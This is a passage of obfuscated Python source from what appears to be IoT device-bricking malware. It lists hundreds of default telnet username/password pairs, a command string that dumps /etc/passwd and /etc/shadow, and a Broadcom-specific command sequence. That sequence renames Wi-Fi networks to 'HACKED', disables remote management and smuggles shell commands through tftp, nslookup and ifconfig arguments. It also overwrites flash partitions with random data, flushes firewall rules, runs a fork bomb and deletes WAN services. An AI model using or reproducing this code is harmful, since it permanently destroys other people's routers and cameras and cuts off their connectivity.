 "root/iDirect" ,
1802
 "root/ikwb" ,
1803
 "root/ikwd" ,
1804
 "root/indigo" ,
1805
 "root/inflection" ,
1806
 "root/ipcam_rt5350" ,
1807
 "root/juantech" ,
1808
 "root/jvbzd" ,
1809
 "root/klv123" ,
1810
 "root/klv1234" ,
1811
 "root/letacla" ,
1812
 "root/LSiuY7pOmZG2s" ,
1813
 "root/Mau'dib" ,
1814
 "root/maxided" ,
1815
 "root/oelinux123" ,
1816
 "root/openvpnas" ,
1817
 "root/oracle" ,
1818
 "root/orion99" ,
1819
 "root/pa55w0rd" ,
1820
 "root/pass" ,
1821
 "root/password" ,
1822
 "root/PASSWORD" ,
1823
 "root/permit" ,
1824
 "root/qwerty" ,
1825
 "root/realtek" ,
1826
 "root/reecam4debug" ,
1827
 "root/root" ,
1828
 "root/root123" ,
1829
 "root/root1234" ,
1830
 "root/root12345" ,
1831
 "root/root123456" ,
1832
 "root/ROOT500" ,
1833
 "root/root54321" ,
1834
 "root/samsung" ,
1835
 "root/Serv4EMC" ,
1836
 "root/skb_ipdcp" ,
1837
 "root/system" ,
1838
 "root/t0talc0ntr0l4!" ,
1839
 "root/tiger" ,
1840
 "root/tini" ,
1841
 "root/toor" ,
1842
 "root/tslinux" ,
1843
 "root/ttnet" ,
1844
 "root/u" ,
1845
 "root/ubnt" ,
1846
 "root/user" ,
1847
 'root/vertex25ektks123' ,
1848
 "root/video" ,
1849
 "root/vizxv" ,
1850
 "root/Win1doW$" ,
1851
 "root/win1dows" ,
1852
 'root/wind5885' ,
1853
 "root/W!n0&oO7." ,
1854
 "root/wyse" ,
1855
 "root/xc3511" ,
1856
 "root/xmhdipc" ,
1857
 "root/zlxx." ,
1858
 "root/zsun1188" ,
1859
 "root/Zte521" ,
1860
 "root/Zte521" ,
1861
 "root/zte9x15" ,
1862
 "ro/ro" ,
1863
 "router/router" ,
1864
 "RSBCMON/SYS" ,
1865
 "rwa/rwa" ,
1866
 "rw/rw" ,
1867
 "scmadmin/scmchangeme" ,
1868
 "scout/scout" ,
1869
 "security/security" ,
1870
 "Service/5678Service" ,
1871
 "service/service" ,
1872
 "service/smile" ,
1873
 "setup/changeme!" ,
1874
 "setup/changeme" ,
1875
 "setup/setup" ,
1876
 "simple/h3c" ,
1877
 "simple/huawei" ,
1878
 "smc/smcadmin" ,
1879
 "spcl/0" ,
1880
 "SPOOLMAN/HPOFFICE" ,
1881
 "steam/steam" ,
1882
 "storwatch/specialist" ,
1883
 "stratacom/stratauser" ,
1884
 "super/5777364" ,
1885
 "superadmin/Is$uper@dmin" ,
1886
 "superadmin/secret" ,
1887
 "superman/21241036" ,
1888
 "superman/superman" ,
1889
 "superman/talent" ,
1890
 "super/asong" ,
1891
 "super/super" ,
1892
 "super.super/master" ,
1893
 "super/surt" ,
1894
 "superuser/123456" ,
1895
 "superuser/123456special" ,
1896
 "superuser/admin" ,
1897
 "superuser/superuser" ,
1898
 "supervisor/PlsChgMe!" ,
1899
 "supervisor/PlsChgMe" ,
1900
 "supervisor/PlsChgMe1" ,
1901
 "supervisor/supervisor" ,
1902
 "supervisor/zyad1234" ,
1903
 "support/123456" ,
1904
 "support/admin" ,
1905
 "support/h179350" ,
1906
 "support/support" ,
1907
 "support/supportpw" ,
1908
 "susAdmin/Administrator" ,
1909
 "su/super" ,
1910
 "sweex/mysweex" ,
1911
 "Sweex/Mysweex" ,
1912
 "Symbol/Admin" ,
1913
 "sysadm/anicusc" ,
1914
 "sysadm/anicust" ,
1915
 "sysadmin/PASS" ,
1916
 "sysadmin/password" ,
1917
 "sysadmin/sysadmin" ,
1918
 "sysadm/sysadm/" ,
1919
 "sysadm/sysadm" ,
1920
 "SYSADM/sysadm" ,
1921
 "SYSDBA/masterkey" ,
1922
 "system/password" ,
1923
 "system/shell" ,
1924
 "system/sys" ,
1925
 "sys/uplink" ,
1926
 "target/password" ,
1927
 "teacher/password" ,
1928
 "teamspeak/teamspeak" ,
1929
 "tech/" ,
1930
 "tech/field" ,
1931
 "tech/tech" ,
1932
 "teladmin/telpwd" ,
1933
 "telco/telco" ,
1934
 "tele2/tele2" ,
1935
 "telecomadmin/******" ,
1936
 "telecomadmin/admintelecom" ,
1937
 "telecomadmin/n" ,
1938
 "telecomadmin/nE7jA%5m" ,
1939
 "telecomadmin/telecomadmin" ,
1940
 "telecom/telecom" ,
1941
 'telekom/telekom' ,
1942
 "tellabs/tellabs#1" ,
1943
 "telnet/telnet" ,
1944
 "temp1/password" ,
1945
 "test1/test1" ,
1946
 "test/test" ,
1947
 "test/test1" ,
1948
 "test/test123" ,
1949
 "testuser/testuser" ,
1950
 "tiara/tiaranet" ,
1951
 "tiger/tiger123" ,
1952
 "tmadmin/tmadmin" ,
1953
 "tmuser/tmuser" ,
1954
 "tomcat/tomcat" ,
1955
 "topicalt/password" ,
1956
 "topicnorm/password" ,
1957
 "topicres/password" ,
1958
 "true/true" ,
1959
 "tw/tw" ,
1960
 "tw007/tw007" ,
1961
 "u/u" ,
1962
 "ubnt/ubnt" ,
1963
 "UBNT/UBNT" ,
1964
 "ubuntu/ubuntu" ,
1965
 "upgrade/Th0ms0n!" ,
1966
 "user3/1234" ,
1967
 "user3/12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678" ,
1968
 "USERID/PASSW0RD" ,
1969
 "user/admin" ,
1970
 "User/Kulacom" ,
1971
 "user/pass" ,
1972
 "user/password" ,
1973
 "User/Password" ,
1974
 "user/power" ,
1975
 "user/public" ,
1976
 "user/pu" ,
1977
 "user/tivonpw" ,
1978
 "user/user" ,
1979
 "usuario/usuario" ,
1980
 "vagrant/vagrant" ,
1981
 "vcr/NetVCR" ,
1982
 'virgin/password' ,
1983
 "vnc/vnc" ,
1984
 "VNC/winterm" ,
1985
 'vodafone/vodafone' ,
1986
 "volition/volition" ,
1987
 "vstarcam2015/20150602" ,
1988
 "vt100/public" ,
1989
 "VTech/VTech" ,
1990
 "vyatta/vyatta" ,
1991
 'wbrnet/183$729' ,
1992
 "webadmin/1234" ,
1993
 "webadmin/webadmin" ,
1994
 "webmaster/webmaster" ,
1995
 "websecadm/changeme" ,
1996
 "wlseuser/wlsepassword" ,
1997
 "wlse/wlsedb" ,
1998
 "WP/HPOFFICE" ,
1999
 "Wproot/cat1029" ,
2000
 "wradmin/trancell" ,
2001
 "write/private" ,
2002
 "www/www" ,
2003
 "xbox/xbox" ,
2004
 "xd/xd" ,
2005
 "zabbix/zabbix" ,
2006
 "ZXDSL/ZXDSL" ,
2007
 "zyuser/1234" ,
2008
 'zyad1234/zyad1234' ,
2009
'admin/vizxv' ,
2010
 'supervisor/zyad5001' ,
2011
 'Mroot/cat1029' ,
2012
 'root/aquario' ,
2013
 'admin/cat1029' ,
2014
 'root/7ujMko0vizxv ' ,
2015
 'root/ivdev' ,
2016
 'guest1/guest1' ,
2017
 'superadmin/' ,
2018
 'support/user' ,
2019
 'root/zyad5001' ,
2020
 'default/antslq' ,
2021
 'root/00' ,
2022
 'admin/ipcam_rt5350' ,
2023
 'root/1111111' ,
2024
 'root/12345678' ,
2025
 'root/333333' ,
2026
 'superadmin/Is@dmin' ,
2027
 'support/123' ,
2028
 'admin/zyad5001' ,
2029
 'admin/support' ,
2030
 'root/smcadmin' ,
2031
 'admin/pass' ,
2032
 'root/qazxsw' ,
2033
 'guest/' ,
2034
 'root/3333333' ,
2035
 'admin/12341234' ,
2036
 'support/1234' ,
2037
 'root/3' ,
2038
 'root/!root' ,
2039
 '/1234' ,
2040
 'admin/5up' ,
2041
 'bin/' ,
2042
 'netgear/admin' ,
2043
 'root/oelinux1234' ,
2044
 'admin/QuestM0dem' ,
2045
 'admin/ttnet' ,
2046
 'admin/service' ,
2047
 'support/' ,
2048
 'Admin/Password' ,
2049
 'root/hdipc%No' ,
2050
 'adm/' ,
2051
 'super.super/' ,
2052
 'administrator/changeme' ,
2053
 'root/555555' ,
2054
 'home/12345678' ,
2055
 'admin/meinsm' ,
2056
 'root/9999' ,
2057
 'user/' ,
2058
 'cusadmin/password' ,
2059
 'user/123456' ,
2060
 'root/1988' ,
2061
 'root/jv' ,
2062
 'root/555' ,
2063
 'root/3ep5w2u' ,
2064
 'admin/zhongxing' ,
2065
 'admin/ca' ,
2066
 'guest/VTech' ,
2067
 'root/33333' ,
2068
 'root/11111111' ,
2069
 'root/root4321' ,
2070
 'admin/adslnadam' ,
2071
 'guest/1111' ,
2072
 'enable/cisco' ,
2073
 'admin/7772000' ,
2074
 'login/comcast' ,
2075
 'root/zhongxing' ,
2076
 'test/' ,
2077
 'adminstrator/meinsm' ,
2078
 'support/12345' ,
2079
 'Administrator/meinsm' ,
2080
 'support/password' ,
2081
 'sys/sys' ,
2082
 'admin/vertex25ektks123' ,
2083
 'admin/Win1doW$' ,
2084
 'admin/xad#12' ,
2085
 'Admin/smcadmin' ,
2086
 'root/xc251' ,
2087
 'root/support' ,
2088
 'support/pass' ,
2089
 'root/0P3N' ,
2090
 'root/Administrator' ,
2091
 'svn/svn' ,
2092
 'admin/zsun1188' ,
2093
 'user/1234' ,
2094
 'root/3333' ,
2095
 'admin/8D8E' ,
2096
 'root/777' ,
2097
 'admin/ztonpk' ,
2098
 'Conf/admin' ,
2099
 'root/asdfgh' ,
2100
 'default/123456' ,
2101
 'sysadm/admin' ,
2102
 'root/alien' ,
2103
 'support/telnet' ,
2104
 'admin/44444' ,
2105
 'alice/alice' ,
2106
 '0000/0000' ,
2107
 'user/raspberry' ,
2108
 'test/guest' ,
2109
 'root/123qwe' ,
2110
 'root/vI' ,
2111
 'supervisor/enable' ,
2112
 '/clear123' ,
2113
 'service/enable' ,
2114
 'root/reecam4de' ,
2115
 'cisco/default' ,
2116
 'root/annie2012' ,
2117
 'sh/shell' ,
2118
 'osteam/5up' ,
2119
 'root/wsxzaq' ,
2120
 'root/xc3518' ,
2121
 'admin/guest' ,
2122
 'root/xc3515' ,
2123
 'support/qrst' ,
2124
 '1/1' ,
2125
 'root/VTech' ,
2126
 'admin/7' ,
2127
 'admin/qwerty' ,
2128
 'netgear/VTech' ,
2129
 'admin/263297' ,
2130
 'root/letmein' ,
2131
 'servlet/manager' ,
2132
 'administrator/Amx1234!' ,
2133
 'user/manager' ,
2134
 'VUTS/VUTS' ,
2135
 'admin/444444' ,
2136
 '/0000' ,
2137
 'admin/Administrator' ,
2138
 'root/111111' ,
2139
 'netgear/Administrator' ,
2140
 'root/99999' ,
2141
 'netgear/root' ,
2142
 'root/qwertyuiop' ,
2143
 '/root' ,
2144
 'root/55555555' ,
2145
 'root/12' ,
2146
 'support/enable' ,
2147
 '/TRWW' ,
2148
 'guest/enable' ,
2149
 'support/root' ,
2150
 'admin/flvbyctnb' ,
2151
 'root/yankeessam40:1961' ,
2152
 'test/testing' ,
2153
 'pnadmin/pnadmin' ,
2154
 'sphinx/sphinx' ,
2155
 'admin/ghbdtn' ,
2156
 'admin/FERUM' ,
2157
 'admin/amvqnekk' ,
2158
 'admin/airlive' ,
2159
 'netgear/password' ,
2160
 'admin/9' ,
2161
 'webstar/webstar' ,
2162
 'root/2' ,
2163
 'support/cisco' ,
2164
 'admin/3333333' ,
2165
 'johnny/johnny' ,
2166
 'login/guest' ,
2167
 'xbmc/bananapi' ,
2168
 'ahetzip8/ahetzip8' ,
2169
 'support/vagrant' ,
2170
 'mgmt/mgmt' ,
2171
 'admin/0508780503' ,
2172
 'admin/vagrant' ,
2173
 'guest/password' ,
2174
 'admin/99' ,
2175
 'admin/00' ,
2176
 'login/manager' ,
2177
 'Administrator/Administrator' ,
2178
 'user/pi' ,
2179
 'admin/adminstrator' ,
2180
 'root/22' ,
2181
 'root/hi3511' ,
2182
 'root/public' ,
2183
 'cisco/password' ,
2184
 'admin/7BBC' ,
2185
 'admin/22' ,
2186
 'admin/RTadmin1979' ,
2187
 'admin/123456780' ,
2188
 'admin/<>' ,
2189
 'cisco/support' ,
2190
 'admin/2w4f6n8k' ,
2191
 'admin/Ferrum' ,
2192
 'guest/netgear' ,
2193
 'root/7777777' ,
2194
 'netgear/123456' ,
2195
 'admin/biyshs9eq' ,
2196
 'realtek/realtek' ,
2197
 'login/test' ,
2198
 'root/9999999' ,
2199
 'admin/99999' ,
2200
 'login/telnet' ,
2201
 'admin/tech' ,
2202
 'admin/&' ,
2203
 'postgres/postgrespass' ,
2204
 '/enable' ,
2205
 'admin/D-Link' ,
2206
 'netgear/1234' ,
2207
 'administrator/password' ,
2208
 'admin/1q2w3e' ,
2209
 'cisco/guest' ,
2210
 'bananapi/bananapi' ,
2211
 'root/44' ,
2212
 'ftp/password' ,
2213
 'login/cisco' ,
2214
 'admin/oelinux123' ,
2215
 'user/login' ,
2216
 'root/telnet' ,
2217
 'admin/hsparouter' ,
2218
 'root/grouter' ,
2219
 'Adminstrator/smcadmin' ,
2220
 'support/Administrator' ,
2221
 'admin/9999999' ,
2222
 'guest/ubnt' ,
2223
 'root/pi' ,
2224
 'cpanel/cf46e3bdb4b929f1' ,
2225
 'root/abc123' ,
2226
 'tyler/tyler' ,
2227
 'admin/adsladmin' ,
2228
 'root/comcast' ,
2229
 'root/666' ,
2230
 'ziggo/draadloos' ,
2231
 'guest/xc3611' ,
2232
 'ubnt/ubntenable' ,
2233
 'admin/cat' ,
2234
 'maint1/sx2000' ,
2235
 'guest/support' ,
2236
 'root/8888888' ,
2237
 'share/share' ,
2238
 'user/Administrator' ,
2239
 'admin/P' ,
2240
 'root/openssh' ,
2241
 'admin/beeline2013' ,
2242
 'admin/szt' ,
2243
 'dm3500/merlin' ,
2244
 'larry/larry' ,
2245
 'root/88888' ,
2246
 'LocalService/DV5800' ,
2247
 'airlive/airlive' ,
2248
 'admin/user' ,
2249
 'root/3e2w1q' ,
2250
 'mt7109/wimax' ,
2251
 'admin/letmein' ,
2252
 'guest/pass' ,
2253
 'admin/999999999' ,
2254
 'administrator/123' ,
2255
 'support/guest' ,
2256
 'daniel/daniel' ,
2257
 'prueba/prueba' ,
2258
 'guest/pi' ,
2259
 'login/D-Link' ,
2260
 'jeff/jeff' ,
2261
 'root/cisco' ,
2262
 'root/22222' ,
2263
 'user/vizxv' ,
2264
 'motherfucker/enable' ,
2265
 'admin/1234root' ,
2266
 'root/zlxx' ,
2267
 'admin/6' ,
2268
 'netgear/default' ,
2269
 'admin/555555' ,
2270
 'admin/raspberry' ,
2271
 'office/office' ,
2272
 'admin/ERRU$' ,
2273
 'svn/123456' ,
2274
 'admin/5' ,
2275
 'admin/zyxel' ,
2276
 'root/bananapi' ,
2277
 'admin/12' ,
2278
 'uucp/uucp' ,
2279
 'test/123456' ,
2280
 'download/download' ,
2281
 'ubnt/enable' ,
2282
 'tst/tst' ,
2283
 'cisco/1234' ,
2284
 'admin/netgear' ,
2285
 'root/77777777' ,
2286
 'ems/ems' ,
2287
 'admin/00000000' ,
2288
 'test/testtest' ,
2289
 'login/Administrator' ,
2290
 'guest/comcast' ,
2291
 'admin/asus' ,
2292
 'support/netgear' ,
2293
 'rob/rob' ,
2294
 'adsl/realtek' ,
2295
 'admin/555555555' ,
2296
 'cisco/12345' ,
2297
 'admin/Admin' ,
2298
 '/private' ,
2299
 'secret/secret' ,
2300
 'cisco/user' ,
2301
 'admin/5555555' ,
2302
 'user/D-Link' ,
2303
 'super/APR@xuniL' ,
2304
 'admin/33333333' ,
2305
 'engineer/amplifier' ,
2306
 'superdba/admin' ,
2307
 'nuucp/nuucp' ,
2308
 'admin/adsl' ,
2309
 'admin/beeline' ,
2310
 'admin/ipcamera' ,
2311
 'default/user' ,
2312
 'root/102030' ,
2313
 'root/nosoup4u' ,
2314
 'sh/sh' ,
2315
 'admin/internet' ,
2316
 'admin/free' ,
2317
 'noc/noc' ,
2318
 'root/222' ,
2319
 '______/______' ,
2320
 'QQQQQQ/QQQQQQ' ,
2321
 'kevin/kevin' ,
2322
 'root/qkrrud7502' ,
2323
 'root/66666666' ,
2324
 'root/8' ,
2325
 'ajay/ajay' ,
2326
 'netgear/pi' ,
2327
 '/admin' ,
2328
 'kyivstar/kyivstar' ,
2329
 'anonymous/anonymous' ,
2330
 'guest/vizxv' ,
2331
 'webftp/webftp123' ,
2332
 'root/t' ,
2333
 'gitlab/gitlab' ,
2334
 'root/Passw0rd' ,
2335
 'support/default' ,
2336
 '1234/1' ,
2337
 '3500/24' ,
2338
 'root/enable' ,
2339
 'password/enable' ,
2340
 'USER/x' ,
2341
 'netgear/D-Link' ,
2342
 'www-data/123456' ,
2343
 'admin/999' ,
2344
 'hector/hector' ,
2345
 'admin/login' ,
2346
 'root/88' ,
2347
 'openerp/openerp' ,
2348
 'cpanel/0fc0f17d6087680e' ,
2349
 '/1' ,
2350
 'root/4444444' ,
2351
 'thomas/thomas123' ,
2352
 '/hewlpack' ,
2353
 'admin/iyeh' ,
2354
 'admin/66666' ,
2355
 'admin/3333' ,
2356
 'user/live' ,
2357
 'maria/maria' ,
2358
 'admin/juklop' ,
2359
 'root/cat' ,
2360
 'root/6y5t4r3e2w1q' ,
2361
 'admin/passw0rd' ,
2362
 'ftpuser/ftppass' ,
2363
 'WEBADM/password' ,
2364
 'root/222222' ,
2365
 'root/PWLA-root' ,
2366
 'admin/airocon' ,
2367
 'admin/gfhjkm' ,
2368
 'cmsftp/cmsftp' ,
2369
 'cisco/admin' ,
2370
 '/XCA2Y12U71' ,
2371
 'mike/mike123' ,
2372
 'root/uClinux' ,
2373
 'root/seiko2005' ,
2374
 '/netadmin' ,
2375
 'bill/bill' ,
2376
 'root/d' ,
2377
 'admin/55' ,
2378
 'root/v' ,
2379
 'root/LZEDADM' ,
2380
 'root/welc0me' ,
2381
 'root/sh' ,
2382
 'ashish/ashish' ,
2383
 'root/555555555' ,
2384
 'root/raspberry' ,
2385
 'admin/33' ,
2386
 'netgear/12345' ,
2387
 'joe/joe' ,
2388
 'root/syste' ,
2389
 'admin/comcast' ,
2390
 'sysadmin/superuser' ,
2391
 'walter/walter' ,
2392
 'guest/abc123' ,
2393
 'test/12345' ,
2394
 'root/operator' ,
2395
 'cisco/123456' ,
2396
 'test/test1234' ,
2397
 'admin/VTech' ,
2398
 'admin/enable' ,
2399
 'web/web123' ,
2400
 '/ascend' ,
2401
 'root/12190091' ,
2402
 'admin/a' ,
2403
 'lms/lms' ,
2404
 'sandeep/sandeep123' ,
2405
 'admin/7777' ,
2406
 'super/zxcvbnm,.' ,
2407
 'cubrid/cubrid' ,
2408
 'portal/portal' ,
2409
 'user/user123' ,
2410
 'ftptest/ftptest' ,
2411
 'support/cat' ,
2412
 'user/default' ,
2413
 'root/4444' ,
2414
 'user/test' ,
2415
 'admin/adminadmin' ,
2416
 'root/t1789' ,
2417
 'test/tester' ,
2418
 'www-data/www-data' ,
2419
 'root/rasplex' ,
2420
 'root/<>' ,
2421
 'admin/ubnt' ,
2422
 'admin/6666666666' ,
2423
 '1234/enable' ,
2424
 'netbrain/$ilv3r*2017' ,
2425
 'default/enable' ,
2426
 'verwalter/verwalter' ,
2427
 'login/1234' ,
2428
 'admin/e2b81d_1' ,
2429
 'vivek/vivek' ,
2430
 'admin/Kendalf9' ,
2431
 'root/999999' ,
2432
 'root/6666666' ,
2433
 'admin/mts' ,
2434
 'jim/jim123' ,
2435
 'jenkins/jenkins123' ,
2436
 'netgear/telnet' ,
2437
 'test/123123' ,
2438
 'admin/qweasdOP' ,
2439
 'mts/mts' ,
2440
 'login/support' ,
2441
 'admin/radmin' ,
2442
 'teste/teste' ,
2443
 'cisco/comcast' ,
2444
 'root/team2' ,
2445
 'debug/debug' ,
2446
 'moodle/moodle123' ,
2447
 'root/G' ,
2448
 'xbmc/xbmc' ,
2449
 'deployer/deployer' ,
2450
 'rptic/raspberry' ,
2451
 '500/500' ,
2452
 'koha/koha123' ,
2453
 'admin/inet' ,
2454
 'jose/jose' ,
2455
 'admin/online' ,
2456
 'TKD/o0mb6mff' ,
2457
 'root/0000000' ,
2458
 'netman/n' ,
2459
 'php5/a82f8443132f0fda' ,
2460
 'root/xbmc' ,
2461
 'support/test' ,
2462
 'cloud/cloud' ,
2463
 'root/openelec' ,
2464
 'admin/590152' ,
2465
 'odoo/odoo' ,
2466
 'login/login' ,
2467
 'admin/11' ,
2468
 'sybase/sybase' ,
2469
 'biz/biz123' ,
2470
 'guest/manager' ,
2471
 'root/r' ,
2472
 'root/Admin123' ,
2473
 'ingres/ingres' ,
2474
 'ubnt/1234' ,
2475
 'admin1/enable' ,
2476
 'admin/nimda' ,
2477
 'jboss/jboss' ,
2478
 'proftpd/proftpd' ,
2479
 'finance/finance' ,
2480
 '666666/enable' ,
2481
 'lucas/lucas' ,
2482
 'library/library' ,
2483
 'root/dup' ,
2484
 'support/support123' ,
2485
 'ncuser/ncuser' ,
2486
 'root/server' ,
2487
 'guest/cisco' ,
2488
 'train/train' ,
2489
 'admin/dPZb4GJTu9' ,
2490
'admin/66' ,
2491
 'admin/Ferum' ,
2492
 'root/pfsense' ,
2493
 'jack/jack' ,
2494
 'cisco/login' ,
2495
 'root/waldo' ,
2496
 'manager/-!.!\'%2' ,
2497
 '/3ascotel' ,
2498
 'deployer/deploy' ,
2499
 'admin/666' ,
2500
 'test/1234' ,
2501
 'admin/sh' ,
2502
 'toto/toto' ,
2503
 'mysql/123456' ,
2504
 'newadmin/newadmin' ,
2505
 'ftp/123456' ,
2506
 'screen/screen' ,
2507
 'cisco/toor' ,
2508
 'root/444444' ,
2509
 'temp/temp' ,
2510
 'root/tl789' ,
2511
 'root/111' ,
2512
 'Administrator/enable' ,
2513
 'openfiler/password' ,
2514
 'root/1q2w3e4r' ,
2515
 'git/git123' ,
2516
 'cpanel/cae0dd132d2d89f5' ,
2517
 'mobile/alpine' ,
2518
 'root/anni2013' ,
2519
 'support/1qaz2wsx' ,
2520
 'admin/manager' ,
2521
 'admin/44' ,
2522
 'admin/enable36291' ,
2523
 'ftpuser/123456' ,
2524
 'mgts/mtsoao' ,
2525
 'userftp/userftp' ,
2526
 'user/dreambox' ,
2527
 'user/enable' ,
2528
 'host/dnnhost' ,
2529
 'admin/qazxsw' ,
2530
 'TKD/5un2na0o' ,
2531
 'admin/rombik1' ,
2532
 'openvpn/openvpn' ,
2533
 'guest/1234' ,
2534
 'git/test1234' ,
2535
 'admin/adn8pzszk' ,
2536
 'default/4U' ,
2537
 'superuser/asante' ,
2538
 'icinga/icinga' ,
2539
 'sshd/sshd' ,
2540
 'enable/show' ,
2541
 ]
2542
if 90 - 90: IIiIIiIii1I
2543
if 9 - 9: O0oo0OOOOO00 % Oooo - oOoO0Ooo % O0oo0OOOOO00
2544
O0O = "SPLTX"
2545
if 81 - 81: Ii11i1iIi / Ii11i1iIi * Oo0 / o0oooooO / IIiIii1iI
2546
iII11I = [ 'TELCO' , 'inet' , 'zyxel' , 'ZYX' , 'zyx' , 'huawei' , 'LZE' , 'lze' , 'qualcomm' , 'dlink' , 'broadcom' , 'router' , 'DLink' , 'main' , 'wan' , 'global' , 'cpa' , 'customer' , 'linux' , 'default' , 'cisco' ]
2547
o00 = [ '%s' % ( random . randint ( 100 , 999 ) ) , '%s' % ( random . randint ( 10 , 99 ) ) , '%s' % ( random . choice ( '%#!@_=;' ) ) , '%s' % ( random . choice ( 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' ) ) ]
2548
o00OooOO0oooo = [ 'admin' , 'ADMIN' , 'support' , 'mgmt' , 'manager' , 'adm' , 'ADM' , 'root' , 'account' , 'cs' , 'corporate' , 'business' , 'fiber' , 'adsl' , 'vdsl' , 'wifi' , 'administrator' , 'Administrator' , 'default' , 'factory' ]
2549
OoO0 = 'root/' + random . choice ( iII11I ) + random . choice ( o00 ) + random . choice ( o00OooOO0oooo )
2550
if 91 - 91: oOOoO00oo0 / Ii11i1iIi
2551
oOoOOoooo0 = "w\nuname -a\nls -alF /etc/\ncat /etc/passwd\ncat /etc/shadow\ncat /proc/version\n" ;
2552
if 55 - 55: OOOoOooO / oOOo0000o + oOoO0Ooo
2553
ooO0o = [
2554
[ "broadcom" , ".*" , "(telnetd.*error.*processInput.*unrec.*|BCM96|ls -alF /etc/: not found)" ,
2555
'lan config --ipaddr primary 10.1.2.3 255.255.255.248' , '' ,
2556
 'wlan config --ssid "HACKED: DEFAULT PASSWORD"' , '' ,
2557
 'wlan config --enable 0' , '' ,
2558
 'wlan config --ssid primary "HACKED: DEFAULT PASSWORD"' , '' ,
2559
 'wlan config --status primary disable' , '' ,
2560
 'save' , '' ,
2561
 'tr69cfg --inform disable' , '' ,
2562
 'tr69cfg --connreq disable' , '' ,
2563
 'tr69cfg --password HACKED' , '' ,
2564
 'tr69cfg --intf HACKED' , '' ,
2565
 'tr69cfg --info' , '' ,
2566
 'tr69c ConnReqPort 31351' , '' ,
2567
 'save' , '' ,
2568
 'tftp -p -t f -f `cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default` 127.0.0.1' , '' ,
2569
 'tftp -p -t c -f `cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default` 127.0.0.1' , '' ,
2570
 'nslookup $(sh)' , '' ,
2571
 'cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default' , '' ,
2572
 'kill `sh`' , '' ,
2573
 'cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default' , '' ,
2574
 'tftp -p -f test ;flash_erase /dev/mtdblock0 0 999999 0;flash_erase /dev/mtdblock1 0 999999 0;flash_erase /dev/mtdblock2 0 999999 0;flash_erase /dev/mtdblock3 0 999999 0' , '' ,
2575
 'tftp -p -f test ;cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root' , '' ,
2576
 'tftp -p -f test ;route del default' , '' ,
2577
 'ifconfig $(sh)' , '' ,
2578
 'cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default' , '' ,
2579
 'cat | sh' , '' ,
2580
 'sh' , '[#>]' ,
2581
 'flash_erase /dev/mtdblock0 0 999999 0' , '[$>#]' ,
2582
 'flash_erase /dev/mtdblock1 0 999999 0' , '[$>#]' ,
2583
 'flash_erase /dev/mtdblock2 0 999999 0' , '[$>#]' ,
2584
 'flash_erase /dev/mtdblock3 0 999999 0' , '[$>#]' ,
2585
 'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
2586
 'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
2587
 'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
2588
 'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
2589
 'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
2590
 'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
2591
 'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
2592
 'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
2593
 'cat /dev/urandom >/dev/mtd0 &' , '' ,
2594
 'cat /dev/urandom >/dev/mtd1 &' , '' ,
2595
 'cat /dev/urandom >/dev/mtd2 &' , '' ,
2596
 'cat /dev/urandom >/dev/mtd3 &' , '' ,
2597
 'route del default;iptables -F;iptables -A INPUT -j DROP' , '%WAIT%' ,
2598
 'poweroff -n -f' , '[#>]' ,
2599
 'poweroff' , '[#>]' ,
2600
 'd(){ d|d & };d 2>/dev/null' , '' ,
2601
 'ping ;busybox cat /dev/urandom >/dev/root;route del default;iptables -F;iptables -A INPUT -j DROP' , '' ,
2602
 'traceroute ;busybox cat /dev/urandom >/dev/root;route del default;iptables -F;iptables -A INPUT -j DROP' , '' ,
2603
 'loaddefaultconfig' , '[#>]' ,
2604
 'adsl connection --loopback' , '' ,
2605
 'xdslctl connection --loopback' , '' ,
2606
 'ppp config ppp0 down' , '' ,
2607
 'ppp config ppp0.1 down' , '' ,
2608
 'ppp config ppp0.2 down' , '' ,
2609
 'ppp config ppp1 down' , '' ,
2610
 'ppp config ppp1.1 down' , '' ,
2611
 'ppp config ppp2.1 down' , '' ,
2612
 'ppp config ppp3.3 down' , '' ,
2613
 'ppp config pppo3G0 down' , '' ,
2614
 'save' , '' ,
2615
 'defaultgateway config ppp0' , '' ,
2616
 'defaultgateway config ppp1.1' , '' ,
2617
 'defaultgateway config ppp2.1' , '' ,
2618
 'save' , '' ,
2619
 'dhcpserver config 192.168.99.1 192.168.99.1 1' , '' ,
2620
 'lan config --ipaddr secondary 10.1.2.4 255.255.255.255' , '' ,
2621
 'save' , '' ,
2622
 'wan delete service ppp0' , '[#>]' ,
2623
 'wan delete service ppp0.1' , '[#>]' ,
2624
 'wan delete service ppp1.1' , '[#>]' ,
2625
 'wan delete service pppoa1' , '[#>]' ,
2626
 'wan delete service pppoa0' , '[#>]' ,
2627
 'wan delete service ppp0.2' , '[#>]' ,
2628
 'wan delete service ppp1.2' , '[#>]' ,
2629
 'wan delete service ppp2.1' , '[#>]' ,
2630
 'wan delete service eth4.1' , '[#>]' ,
2631
 'wan delete service eth4.2' , '[#>]' ,
2632
 'wan delete service ipoe_eth0_4' , '[#>]' ,
2633
